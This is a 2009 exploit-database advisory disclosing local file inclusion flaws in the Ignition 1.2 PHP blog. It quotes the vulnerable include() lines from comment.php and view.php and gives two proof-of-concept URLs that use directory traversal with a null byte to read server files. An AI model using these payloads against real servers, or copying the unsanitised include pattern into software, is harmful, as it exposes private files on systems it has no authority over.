ad

Ignition 1.2 - Multiple Local File Inclusion Vulnerabilities



EDB-ID: 10569 CVE: 2009-4426 OSVDB-ID: 61225
Author: cOndemned Published: 2009-12-20 Verified: Verified
Exploit Code:   Download Vulnerable App:    Download

Rating

(0.0)
Prev Home Next
Ignition 1.2 Multiple Local File Inclusion Vulnerabilities
disclosed by cOndemned
download: http://launchpadlibrarian.net/27567060/ignition_1.2.zip
note: magic_quotes_gpc should be turned off in order to exploit this vulnerability
greetz: all friends, SecurityReason team :)


comment.php

	1.	<?php 
	2.	session_start();
	3.	require ('settings.php');
	4.	include ('posts/'.$_GET['blog'].'.txt');			# [1]
	5.	?>


view.php

	1.	<?php
	2.	session_start();
	3.	require ('settings.php');
	4.	$blog = $_GET['blog'];
	5.	if (file_exists('posts/'.$_GET['blog'].'.txt')) {
	6.	include ('posts/'.$_GET['blog'].'.txt');			# [2]
	7.	}else{


proof of concept:

	[1] http://[attacked_box]/[ignition1.2]/comment.php?blog=../../../../[local_file]%00
	[2] http://[attacked_box]/[ignition1.2]/view.php?blog=../../../../../[local_file]%00